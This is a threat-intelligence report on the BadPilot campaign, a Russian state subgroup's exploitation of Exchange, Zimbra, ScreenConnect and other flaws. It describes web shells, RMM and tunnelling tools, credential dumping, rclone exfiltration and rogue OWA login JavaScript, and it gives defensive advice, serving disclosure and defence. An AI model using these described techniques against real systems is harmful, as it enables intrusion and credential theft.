BadPilot Campaign Global Cyber Operations by a Seashell Blizzard Subgroup

Summary

Cyble Research Intelligence Labs (CRIL) came across an interesting finding by Microsoft Threat Intelligence, which has uncovered a subgroup within the Russian state actor Seashell Blizzard, tracked as the “BadPilot campaign.” Active since 2021, this subgroup has conducted global cyber intrusions, including recent attacks targeting the U.S. and U.K. by exploiting vulnerabilities in widely used software. Their operations have enabled persistent access to high-value sectors such as energy, telecommunications, shipping, defense, and government, supporting Russia’s strategic objectives, including destructive cyberattacks in Ukraine since 2023.

Seashell Blizzard, linked to Russia’s GRU Unit 74455, is a highly skilled cyber threat actor active since 2013, known for espionage, destructive cyberattacks, and targeting critical infrastructure like energy, government, and military systems, especially during conflicts such as Russia’s invasion of Ukraine. Using tools like Cobalt Strike and DarkCrystalRAT, the group employs targeted, opportunistic, and hybrid methods for network intrusions, often gaining persistent access for further intelligence and disruption. Also known as Sandworm or APT44, Seashell Blizzard remains a significant cyber threat with a focus on high-priority targets.

Technical Details

The Seashell Blizzard initial access subgroup has been opportunistically compromising perimeter infrastructure since late 2021 by exploiting published CVEs through direct scanning and third-party internet scanning services. Post-exploitation, the group employs consistent TTPs for persistence and lateral movement, which have become more evasive over time. At least eight vulnerabilities in server infrastructure, including Microsoft Exchange (CVE-2021-34473), Zimbra (CVE-2022-41352), OpenFire (CVE-2023-32315), and ConnectWise ScreenConnect (CVE-2024-1709), have been exploited, with established persistence often preceding destructive attacks.

Exploitation Patterns:

1. RMM Suites for Persistence and C2 (2024–Present):

Exploiting ConnectWise ScreenConnect and Fortinet FortiClient EMS, the subgroup deployed RMM tools like Atera Agent and Splashtop for C2, evading detection by masquerading as legitimate utilities. Credential access was achieved through registry dumps, renamed procdump, and Task Manager interactions, while data exfiltration used rclone.exe. The group also deployed OpenSSH with unique public keys and introduced ShadowLink, a Tor-based hidden service providing covert remote access, bypassing traditional C2 channels.

2. Web Shell Deployment (2021–Present):

Primarily using web shells for persistence post-exploitation, the subgroup leveraged Microsoft Exchange and Zimbra vulnerabilities to deploy custom ASPX web shells (e.g., LocalOlive) for C2 and secondary activities like file uploads, command execution, and port opening. Fingerprinting commands followed web shell deployment, and tunneling tools like Chisel, plink, and rsockstun established reverse tunnels to VPS infrastructure using aliases such as MsChSoft.exe and Msoft.exe.

3. Infrastructure Modification (2021–2024):

The subgroup modified Outlook Web Access (OWA) sign-in pages with rogue JavaScript to collect credentials in real-time and send them to actor-controlled infrastructure (e.g., hwupdates[.]com). Additionally, DNS A record modifications were observed, potentially for credential interception from critical authentication services.

This subgroup’s evolving techniques, including the deployment of legitimate tools for persistence, Tor-based remote access, and credential collection through infrastructure modification, demonstrate its advanced capabilities in maintaining long-term access to high-value networks.

The table below highlights the key details of this campaign.

Conclusion

Seashell Blizzard’s initial access subgroup is expected to continue developing scalable techniques to compromise networks in Ukraine and globally, supporting Russia’s war efforts and national interests. With its broad reach and expanding geographical targets, this subgroup enhances Seashell Blizzard’s operational scope. It provides Russia with ongoing opportunities for cyber operations and strategic advantages in the medium term.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

● Deploy MFA across all critical systems and remote access points to reduce the risk of credential-based attacks. Even if credentials are compromised, MFA adds an additional layer of security, preventing unauthorized access.

● Ensure timely patching of all software, especially Internet-facing infrastructure, by applying security updates for known vulnerabilities (e.g., CVE-2024-1709, CVE-2023- 48788). Implement automated tools to scan and update systems, reducing the risk of exploitation by threat actors.

● Segment critical infrastructure from less sensitive networks to limit lateral movement after a breach. Use continuous monitoring tools to detect unusual activities and employ advanced logging and alerting mechanisms for quick incident response.